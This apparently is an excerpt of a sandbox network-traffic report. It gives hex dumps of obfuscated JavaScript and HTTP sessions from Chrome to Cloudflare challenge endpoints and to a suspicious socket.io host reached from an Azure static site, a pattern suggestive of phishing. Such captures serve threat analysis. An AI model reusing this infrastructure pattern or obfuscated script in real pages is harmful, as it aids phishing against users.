                                                                                                                                                                                                                                2024-10-03 20:57:25 UTC1369INData Raw: 45 2c 46 2c 47 2c 48 2c 49 2c 4a 2c 4b 2c 4c 2c 4d 29 7b 69 66 28 67 4c 3d 67 4a 2c 64 5b 67 4c 28 35 39 38 29 5d 28 6e 75 6c 6c 2c 69 29 29 72 65 74 75 72 6e 27 27 3b 66 6f 72 28 78 3d 7b 7d 2c 42 3d 7b 7d 2c 43 3d 27 27 2c 44 3d 32 2c 45 3d 33 2c 46 3d 32 2c 47 3d 5b 5d 2c 48 3d 30 2c 49 3d 30 2c 4a 3d 30 3b 4a 3c 69 5b 67 4c 28 38 35 36 29 5d 3b 4a 2b 3d 31 29 69 66 28 64 5b 67 4c 28 31 33 35 32 29 5d 28 64 5b 67 4c 28 31 32 31 34 29 5d 2c 67 4c 28 31 33 37 37 29 29 29 4d 5b 67 4c 28 31 33 34 39 29 5d 5b 67 4c 28 35 31 33 29 5d 3d 67 4c 28 34 37 35 29 3b 65 6c 73 65 20 69 66 28 4b 3d 69 5b 67 4c 28 31 31 37 32 29 5d 28 4a 29 2c 4f 62 6a 65 63 74 5b 67 4c 28 31 35 37 32 29 5d 5b 67 4c 28 31 37 39 38 29 5d 5b 67 4c 28 35 37 32 29 5d 28 78 2c 4b 29 7c 7c
                                                                                                                                                                                                                                Data Ascii: E,F,G,H,I,J,K,L,M){if(gL=gJ,d[gL(598)](null,i))return'';for(x={},B={},C='',D=2,E=3,F=2,G=[],H=0,I=0,J=0;J<i[gL(856)];J+=1)if(d[gL(1352)](d[gL(1214)],gL(1377)))M[gL(1349)][gL(513)]=gL(475);else if(K=i[gL(1172)](J),Object[gL(1572)][gL(1798)][gL(572)](x,K)||
                                                                                                                                                                                                                                2024-10-03 20:57:25 UTC1369INData Raw: 2c 48 3d 30 29 3a 49 2b 2b 2c 73 2b 2b 29 3b 66 6f 72 28 4d 3d 43 5b 67 4c 28 31 37 31 39 29 5d 28 30 29 2c 73 3d 30 3b 38 3e 73 3b 48 3d 48 3c 3c 31 2e 33 7c 31 26 4d 2c 64 5b 67 4c 28 31 38 36 36 29 5d 28 49 2c 6a 2d 31 29 3f 28 49 3d 30 2c 47 5b 67 4c 28 37 36 34 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e 3d 31 2c 73 2b 2b 29 3b 7d 65 6c 73 65 20 69 66 28 64 5b 67 4c 28 35 34 36 29 5d 21 3d 3d 67 4c 28 36 39 38 29 29 7b 66 6f 72 28 4d 3d 31 2c 73 3d 30 3b 73 3c 46 3b 48 3d 48 3c 3c 31 2e 39 37 7c 4d 2c 49 3d 3d 64 5b 67 4c 28 31 30 38 35 29 5d 28 6a 2c 31 29 3f 28 49 3d 30 2c 47 5b 67 4c 28 37 36 34 29 5d 28 64 5b 67 4c 28 31 34 39 33 29 5d 28 6f 2c 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3d 30 2c 73 2b 2b 29 3b 66 6f 72 28 4d 3d
                                                                                                                                                                                                                                Data Ascii: ,H=0):I++,s++);for(M=C[gL(1719)](0),s=0;8>s;H=H<<1.3|1&M,d[gL(1866)](I,j-1)?(I=0,G[gL(764)](o(H)),H=0):I++,M>>=1,s++);}else if(d[gL(546)]!==gL(698)){for(M=1,s=0;s<F;H=H<<1.97|M,I==d[gL(1085)](j,1)?(I=0,G[gL(764)](d[gL(1493)](o,H)),H=0):I++,M=0,s++);for(M=
                                                                                                                                                                                                                                2024-10-03 20:57:25 UTC1369INData Raw: 33 29 5d 28 6f 2c 49 2b 2b 29 29 2c 4a 7c 3d 28 30 3c 4e 3f 31 3a 30 29 2a 46 2c 46 3c 3c 3d 31 29 3b 4f 3d 64 5b 67 4f 28 37 31 37 29 5d 28 65 2c 4a 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 67 4f 28 35 37 36 29 5d 28 32 2c 31 36 29 2c 46 3d 31 3b 46 21 3d 4b 3b 4e 3d 48 26 47 2c 48 3e 3e 3d 31 2c 48 3d 3d 30 26 26 28 48 3d 6a 2c 47 3d 64 5b 67 4f 28 37 31 37 29 5d 28 6f 2c 49 2b 2b 29 29 2c 4a 7c 3d 64 5b 67 4f 28 36 36 36 29 5d 28 30 3c 4e 3f 31 3a 30 2c 46 29 2c 46 3c 3c 3d 31 29 3b 4f 3d 65 28 4a 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 3a 72 65 74 75 72 6e 27 27 7d 66 6f 72 28 45 3d 73 5b 33 5d 3d 4f 2c 44 5b 67 4f 28 37 36 34 29 5d 28 4f 29 3b 3b 29 7b 69 66 28 64 5b 67 4f 28 36 35 34 29 5d 28 49 2c
                                                                                                                                                                                                                                Data Ascii: 3)](o,I++)),J|=(0<N?1:0)*F,F<<=1);O=d[gO(717)](e,J);break;case 1:for(J=0,K=Math[gO(576)](2,16),F=1;F!=K;N=H&G,H>>=1,H==0&&(H=j,G=d[gO(717)](o,I++)),J|=d[gO(666)](0<N?1:0,F),F<<=1);O=e(J);break;case 2:return''}for(E=s[3]=O,D[gO(764)](O);;){if(d[gO(654)](I,
                                                                                                                                                                                                                                2024-10-03 20:57:25 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 28 47 2c 48 2c 49 29 7b 72 65 74 75 72 6e 20 47 28 48 2c 49 29 7d 2c 27 6c 74 7a 6a 4c 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 2b 48 7d 7d 2c 68 3d 3d 3d 6e 75 6c 6c 7c 7c 76 6f 69 64 20 30 3d 3d 3d 68 29 72 65 74 75 72 6e 20 6a 3b 66 6f 72 28 78 3d 65 54 28 68 29 2c 67 5b 67 54 28 31 36 32 36 29 5d 5b 67 54 28 36 34 36 29 5d 26 26 28 78 3d 78 5b 67 54 28 38 35 34 29 5d 28 67 5b 67 54 28 31 36 32 36 29 5d 5b 67 54 28 36 34 36 29 5d 28 68 29 29 29 2c 78 3d 67 5b 67 54 28 31 30 33 31 29 5d 5b 67 54 28 31 30 31 35 29 5d 26 26 67 5b 67 54 28 31 33 35 38 29 5d 3f 67 5b 67 54 28 31 30 33 31 29 5d 5b 67 54 28 31 30 31 35 29 5d 28 6e 65 77 20 67 5b 28 67 54 28 31 33 35 38 29 29 5d 28 78 29 29 3a 66 75 6e 63
                                                                                                                                                                                                                                Data Ascii: function(G,H,I){return G(H,I)},'ltzjL':function(G,H){return G+H}},h===null||void 0===h)return j;for(x=eT(h),g[gT(1626)][gT(646)]&&(x=x[gT(854)](g[gT(1626)][gT(646)](h))),x=g[gT(1031)][gT(1015)]&&g[gT(1358)]?g[gT(1031)][gT(1015)](new g[(gT(1358))](x)):func
                                                                                                                                                                                                                                2024-10-03 20:57:25 UTC1369INData Raw: 72 6e 20 67 28 68 29 7d 2c 27 6d 78 41 58 64 27 3a 66 75 6e 63 74 69 6f 6e 28 67 2c 68 29 7b 72 65 74 75 72 6e 20 67 28 68 29 7d 7d 29 3b 74 72 79 7b 72 65 74 75 72 6e 20 68 46 28 31 37 38 31 29 3d 3d 3d 65 5b 68 46 28 38 38 30 29 5d 3f 65 5b 68 46 28 39 37 38 29 5d 28 66 72 2c 63 29 3a 76 6f 69 64 20 30 7d 63 61 74 63 68 28 68 29 7b 72 65 74 75 72 6e 20 66 70 28 65 5b 68 46 28 34 33 39 29 5d 28 66 71 2c 63 29 29 7d 7d 2c 65 4d 5b 67 49 28 31 36 38 31 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 47 2c 64 2c 65 2c 66 2c 67 29 7b 68 47 3d 67 49 2c 64 3d 7b 7d 2c 64 5b 68 47 28 31 33 38 38 29 5d 3d 68 47 28 31 37 30 34 29 2c 64 5b 68 47 28 34 35 38 29 5d 3d 68 47 28 31 36 34 35 29 2c 64 5b 68 47 28 31 30 36 30 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72
                                                                                                                                                                                                                                Data Ascii: rn g(h)},'mxAXd':function(g,h){return g(h)}});try{return hF(1781)===e[hF(880)]?e[hF(978)](fr,c):void 0}catch(h){return fp(e[hF(439)](fq,c))}},eM[gI(1681)]=function(hG,d,e,f,g){hG=gI,d={},d[hG(1388)]=hG(1704),d[hG(458)]=hG(1645),d[hG(1060)]=function(h,i){r
                                                                                                                                                                                                                                2024-10-03 20:57:25 UTC1369INData Raw: 31 29 2c 6b 5b 68 49 28 31 30 35 30 29 5d 29 2b 65 4d 5b 68 49 28 35 30 31 29 5d 5b 68 49 28 31 38 35 33 29 5d 2b 27 2f 27 2b 65 4d 5b 68 49 28 35 30 31 29 5d 5b 68 49 28 39 38 38 29 5d 2b 27 2f 27 2c 65 4d 5b 68 49 28 35 30 31 29 5d 5b 68 49 28 36 33 38 29 5d 29 2c 6f 3d 7b 7d 2c 6f 5b 68 49 28 31 34 35 37 29 5d 3d 65 4d 5b 68 49 28 35 30 31 29 5d 5b 68 49 28 31 34 35 37 29 5d 2c 6f 5b 68 49 28 31 31 31 34 29 5d 3d 65 4d 5b 68 49 28 35 30 31 29 5d 5b 68 49 28 31 31 31 34 29 5d 2c 6f 5b 68 49 28 31 38 33 30 29 5d 3d 65 4d 5b 68 49 28 35 30 31 29 5d 5b 68 49 28 31 38 33 30 29 5d 2c 73 3d 6f 2c 78 3d 6e 65 77 20 65 4d 5b 28 68 49 28 31 30 34 32 29 29 5d 28 29 2c 21 78 29 72 65 74 75 72 6e 3b 42 3d 68 49 28 31 31 34 32 29 2c 78 5b 68 49 28 31 31 32 33 29 5d
                                                                                                                                                                                                                                Data Ascii: 1),k[hI(1050)])+eM[hI(501)][hI(1853)]+'/'+eM[hI(501)][hI(988)]+'/',eM[hI(501)][hI(638)]),o={},o[hI(1457)]=eM[hI(501)][hI(1457)],o[hI(1114)]=eM[hI(501)][hI(1114)],o[hI(1830)]=eM[hI(501)][hI(1830)],s=o,x=new eM[(hI(1042))](),!x)return;B=hI(1142),x[hI(1123)]
                                                                                                                                                                                                                                2024-10-03 20:57:25 UTC1369INData Raw: 36 29 2c 27 65 50 75 6a 73 27 3a 66 75 6e 63 74 69 6f 6e 28 66 29 7b 72 65 74 75 72 6e 20 66 28 29 7d 2c 27 68 51 62 4c 4b 27 3a 69 44 28 31 32 35 32 29 2c 27 65 46 45 4e 53 27 3a 69 44 28 37 36 32 29 2c 27 7a 73 72 59 5a 27 3a 66 75 6e 63 74 69 6f 6e 28 66 2c 67 29 7b 72 65 74 75 72 6e 20 66 28 67 29 7d 7d 2c 65 3d 63 5b 69 44 28 31 31 36 37 29 5d 2c 65 26 26 65 5b 69 44 28 38 34 39 29 5d 3d 3d 3d 64 5b 69 44 28 38 38 38 29 5d 26 26 65 5b 69 44 28 37 37 34 29 5d 3d 3d 3d 64 5b 69 44 28 39 30 36 29 5d 3f 67 31 3d 73 65 74 49 6e 74 65 72 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 69 45 2c 66 2c 67 2c 69 2c 6a 2c 6b 29 7b 28 69 45 3d 69 44 2c 66 3d 7b 7d 2c 66 5b 69 45 28 31 34 39 38 29 5d 3d 69 45 28 39 36 33 29 2c 66 5b 69 45 28 37 38 33 29 5d 3d 69 45 28 31
                                                                                                                                                                                                                                Data Ascii: 6),'ePujs':function(f){return f()},'hQbLK':iD(1252),'eFENS':iD(762),'zsrYZ':function(f,g){return f(g)}},e=c[iD(1167)],e&&e[iD(849)]===d[iD(888)]&&e[iD(774)]===d[iD(906)]?g1=setInterval(function(iE,f,g,i,j,k){(iE=iD,f={},f[iE(1498)]=iE(963),f[iE(783)]=iE(1


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                90192.168.2.44984979.137.248.1524432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:25 UTC668OUTGET /socket.io/?EIO=4&transport=polling&t=P9KB53T&sid=upBLX-IH5e62neF1AANX HTTP/1.1
                                                                                                                                                                                                                                Host: one.anotherarcher.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Origin: https://q0ednre2adn0en00.z1.web.core.windows.net
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Referer: https://q0ednre2adn0en00.z1.web.core.windows.net/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:25 UTC175INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:25 GMT
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                2024-10-03 20:57:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                91192.168.2.44985179.137.248.1524432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:25 UTC414OUTGET /socket.io/?EIO=4&transport=polling&t=P9KB4i2&sid=upBLX-IH5e62neF1AANX HTTP/1.1
                                                                                                                                                                                                                                Host: one.anotherarcher.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:25 UTC207INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:25 GMT
                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                2024-10-03 20:57:25 UTC52INData Raw: 32 39 0d 0a 7b 22 63 6f 64 65 22 3a 31 2c 22 6d 65 73 73 61 67 65 22 3a 22 53 65 73 73 69 6f 6e 20 49 44 20 75 6e 6b 6e 6f 77 6e 22 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 29{"code":1,"message":"Session ID unknown"}0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                92192.168.2.449852104.18.94.414432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:25 UTC785OUTGET /cdn-cgi/challenge-platform/h/g/i/8ccfd805a9cd425d/1727989041725/ojbtsX4PF9lVuS1 HTTP/1.1
                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/7i029/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:25 UTC170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:25 GMT
                                                                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                                                                Content-Length: 61
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8ccfd82e1d9d7cf9-EWR
                                                                                                                                                                                                                                2024-10-03 20:57:25 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 48 00 00 00 17 08 02 00 00 00 27 57 9e 32 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                Data Ascii: PNGIHDRH'W2IDAT$IENDB`


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                93192.168.2.449854104.18.94.414432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:27 UTC925OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/223406031:1727987438:Xv_Al2IpeM4HkywcXvVtjay6EDDaGmub-i6LKQI9Wig/8ccfd82849af42f2/57d4757eac0388b HTTP/1.1
                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                Content-Length: 3138
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Content-type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                CF-Challenge: 57d4757eac0388b
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Origin: https://challenges.cloudflare.com
                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/jrwmv/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:27 UTC3138OUTData Raw: 76 5f 38 63 63 66 64 38 32 38 34 39 61 66 34 32 66 32 3d 34 45 70 52 30 52 79 52 45 52 75 52 31 6d 47 32 6d 47 33 52 6d 59 4b 63 76 44 6d 55 47 76 47 71 62 59 65 4c 49 47 4d 50 25 32 62 47 49 49 6d 46 47 4e 47 2d 59 55 63 67 49 47 6e 6e 47 34 52 65 63 51 55 6f 67 76 49 47 6b 47 46 49 4b 62 30 6a 75 59 4a 47 34 47 47 4a 45 47 4e 74 62 49 47 55 6d 30 70 51 56 47 38 33 4e 62 6a 75 38 71 6d 4a 47 6c 47 35 79 30 66 75 32 67 59 51 44 6f 47 66 33 2b 30 7a 72 74 62 57 6f 56 65 47 34 70 50 70 47 35 49 51 2d 65 67 4e 6e 5a 7a 63 32 71 70 6f 47 65 68 64 76 6d 52 51 34 6e 49 51 69 51 52 4e 37 6d 52 47 66 34 47 51 7a 2d 70 47 58 57 75 4e 49 47 6d 6f 47 6a 6c 63 6f 58 66 79 6a 65 4b 4a 47 41 59 47 78 47 51 67 47 66 52 47 64 41 4a 71 47 38 49 47 2b 51 52 47 72 57 6b 64
                                                                                                                                                                                                                                Data Ascii: v_8ccfd82849af42f2=4EpR0RyRERuR1mG2mG3RmYKcvDmUGvGqbYeLIGMP%2bGIImFGNG-YUcgIGnnG4RecQUogvIGkGFIKb0juYJG4GGJEGNtbIGUm0pQVG83Nbju8qmJGlG5y0fu2gYQDoGf3+0zrtbWoVeG4pPpG5IQ-egNnZzc2qpoGehdvmRQ4nIQiQRN7mRGf4GQz-pGXWuNIGmoGjlcoXfyjeKJGAYGxGQgGfRGdAJqG8IG+QRGrWkd
                                                                                                                                                                                                                                2024-10-03 20:57:27 UTC717INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:27 GMT
                                                                                                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                Content-Length: 152112
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                cf-chl-gen: 7lGh3pumz0GVQ3+K/7vltFMnRwTOKtggkM0qjfYXi9SHprSlN7/QJ+dqha2gkl4eNAZ/yAHqjx7VeW02aG8EoRF9sSG+zLC+fRDwKt+0N+25OgPpe/5KB31N3+Khlu7JQyG3V8S2Sz7IcHEFEzFAJbLaP1MGwQ9Fm3TdM0Z9w0Rf/Tm8MXL383ZDbymBAK73aSi1WCWXwzl0EklpuK72RzNISpr5PNzHt6l27Y1uXUbMBeQLlquOASxku8qdSh/Qas2LffjUndisVNcTHamM0fuBMHoiT+8NMhLKJ2Y7xxOQqNTeb+BDf6ay79918S/ahYJMoI/mYJ3JML0tc57cEd4bLG5WgcBB26ZVGPZ1uh1ZBmfn9CvuFOgblrYMQbhzGHUuVKWoNS6m8CkmDRL4RH/lSzJJpZLifw8SMlxd5UI/6Sft9wquCfuB/5bJWpGvGsoQXvMWMvRp4nXuongLPOXyRXwSA2tfIcrL8E3ItPU+IrQ=$WIu+4PvSfwWKj8XY
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8ccfd83a9ec3de9a-EWR
                                                                                                                                                                                                                                2024-10-03 20:57:27 UTC652INData Raw: 6b 33 4f 50 6d 55 35 6c 58 58 74 72 6b 59 32 68 6d 35 70 2f 5a 5a 69 66 6f 57 75 64 5a 47 52 6d 72 6e 47 6a 69 62 43 76 67 59 43 34 65 49 78 34 6d 6f 65 4a 66 6e 2f 42 69 70 52 36 65 37 2b 6f 74 61 43 71 75 5a 36 57 7a 38 32 59 68 37 37 42 71 6f 36 76 30 4d 43 53 72 70 4b 77 76 64 76 52 72 4b 6e 51 74 72 58 6c 77 73 47 36 36 4c 72 6b 76 4c 66 59 32 65 44 45 30 65 32 76 74 4f 50 57 2b 4c 6e 43 7a 65 58 4a 7a 39 66 63 33 76 69 31 33 4f 4c 38 75 65 48 41 42 76 50 6d 2f 63 30 52 78 39 7a 53 37 2f 4c 78 35 2b 58 78 39 4f 76 70 39 64 54 6e 47 68 72 75 48 67 37 67 39 4f 50 33 4a 51 41 63 39 2b 4c 31 44 67 55 74 43 76 73 4f 44 67 48 79 44 68 62 78 48 42 55 61 43 79 6e 31 48 2f 6c 43 4e 45 51 52 52 6b 49 67 42 44 78 4c 43 6a 68 51 49 51 73 7a 4d 53 34 71 52 54 67
                                                                                                                                                                                                                                Data Ascii: k3OPmU5lXXtrkY2hm5p/ZZifoWudZGRmrnGjibCvgYC4eIx4moeJfn/BipR6e7+otaCquZ6Wz82Yh77Bqo6v0MCSrpKwvdvRrKnQtrXlwsG66LrkvLfY2eDE0e2vtOPW+LnCzeXJz9fc3vi13OL8ueHABvPm/c0Rx9zS7/Lx5+Xx9Ovp9dTnGhruHg7g9OP3JQAc9+L1DgUtCvsODgHyDhbxHBUaCyn1H/lCNEQRRkIgBDxLCjhQIQszMS4qRTg
                                                                                                                                                                                                                                2024-10-03 20:57:27 UTC1369INData Raw: 57 57 39 5a 51 56 4e 6b 53 49 61 44 69 57 47 4f 52 6f 31 5a 65 33 78 68 6b 33 2b 52 6a 57 6c 31 69 4a 79 59 6a 48 78 67 6a 59 43 43 65 48 6d 55 68 59 53 68 5a 6e 74 2b 64 6e 79 67 65 61 32 51 6b 61 36 6f 64 4a 4e 31 6d 49 57 4f 71 33 75 31 69 61 71 62 6c 34 31 37 66 5a 43 5a 6c 61 4b 54 76 33 36 56 71 5a 75 78 79 59 32 30 68 6f 32 67 7a 72 66 4c 32 64 58 58 78 36 36 5a 75 65 4c 4b 34 4d 32 67 73 4e 62 6d 78 62 54 59 32 5a 2b 35 74 2b 62 77 37 2f 54 31 38 2b 72 30 73 74 4c 35 75 76 44 77 36 66 4f 35 79 76 54 6b 39 37 33 2b 32 4d 41 4a 41 41 54 2b 32 74 7a 6e 78 77 48 52 36 67 72 79 46 39 58 50 38 73 77 4b 45 42 48 31 2b 64 72 71 34 50 67 58 33 51 4c 68 46 76 76 36 49 53 6a 6a 4b 50 67 75 43 68 34 79 43 76 41 51 44 76 45 34 39 66 72 7a 46 77 66 34 39 30 49
                                                                                                                                                                                                                                Data Ascii: WW9ZQVNkSIaDiWGORo1Ze3xhk3+RjWl1iJyYjHxgjYCCeHmUhYShZnt+dnygea2Qka6odJN1mIWOq3u1iaqbl417fZCZlaKTv36VqZuxyY20ho2gzrfL2dXXx66ZueLK4M2gsNbmxbTY2Z+5t+bw7/T18+r0stL5uvDw6fO5yvTk973+2MAJAAT+2tznxwHR6gryF9XP8swKEBH1+drq4PgX3QLhFvv6ISjjKPguCh4yCvAQDvE49frzFwf490I
                                                                                                                                                                                                                                2024-10-03 20:57:27 UTC1369INData Raw: 48 56 73 64 47 79 43 68 33 68 6d 69 58 53 54 54 59 46 32 5a 6c 46 56 61 6d 57 57 61 4a 31 57 58 47 75 69 65 32 4e 77 70 56 35 69 63 36 71 44 61 57 57 59 72 6f 32 69 6e 35 4e 2f 69 70 52 7a 68 6f 69 63 65 59 75 54 65 61 69 34 6a 59 4f 62 6a 73 46 39 78 73 43 37 67 35 6d 57 6f 34 6e 49 79 4a 32 46 77 63 6a 4a 30 74 6a 61 70 4e 66 55 6d 74 6d 7a 7a 62 72 67 75 4a 72 4f 74 62 75 34 78 72 71 6b 31 74 58 76 32 2f 44 66 32 75 48 55 33 63 53 2f 35 62 6e 43 30 75 79 76 78 74 61 2f 7a 37 53 35 2f 74 6e 53 39 2f 37 37 38 74 2f 6a 32 51 7a 71 32 51 44 2b 30 78 49 44 45 51 45 47 35 4e 6a 77 47 67 73 65 33 51 37 73 33 78 38 69 45 79 59 42 34 43 67 4a 2f 75 4d 48 37 69 59 4e 49 67 30 4f 45 78 41 49 37 77 63 57 4b 50 4d 78 47 79 35 42 44 6a 34 7a 39 51 52 43 4a 44 41 52
                                                                                                                                                                                                                                Data Ascii: HVsdGyCh3hmiXSTTYF2ZlFVamWWaJ1WXGuie2NwpV5ic6qDaWWYro2in5N/ipRzhoiceYuTeai4jYObjsF9xsC7g5mWo4nIyJ2FwcjJ0tjapNfUmtmzzbrguJrOtbu4xrqk1tXv2/Df2uHU3cS/5bnC0uyvxta/z7S5/tnS9/778t/j2Qzq2QD+0xIDEQEG5NjwGgse3Q7s3x8iEyYB4CgJ/uMH7iYNIg0OExAI7wcWKPMxGy5BDj4z9QRCJDAR
                                                                                                                                                                                                                                2024-10-03 20:57:27 UTC1369INData Raw: 32 4b 5a 30 35 7a 55 35 53 44 56 59 70 32 62 33 4e 35 56 35 71 63 6e 31 32 65 65 34 35 6c 58 34 4f 63 70 6e 2b 6c 6e 57 5a 76 6e 61 46 71 6e 72 47 66 63 61 4f 44 6c 33 4e 74 68 37 47 50 6c 61 6d 78 66 61 37 42 73 34 47 79 79 62 2b 44 66 5a 65 39 69 62 75 34 6e 73 47 79 6a 71 6d 31 7a 63 69 33 31 71 37 50 33 61 65 7a 33 37 53 31 34 4e 7a 6a 6f 62 71 7a 79 62 75 2b 6f 38 4b 67 36 65 47 73 78 62 33 45 35 4d 4b 74 36 75 48 46 75 76 57 36 38 37 7a 53 39 62 77 45 30 63 4c 78 75 65 54 68 78 4f 6a 4c 41 4e 6a 4e 34 78 48 69 42 4e 7a 68 31 42 58 50 42 63 77 5a 42 68 72 51 39 74 37 68 33 65 34 51 37 51 44 76 35 41 6a 63 44 4f 59 68 44 52 38 73 4d 78 51 69 43 53 44 32 37 54 59 37 45 50 72 32 47 68 38 58 44 54 51 56 51 77 30 50 44 7a 55 70 45 78 38 4a 4f 6b 4a 50 43
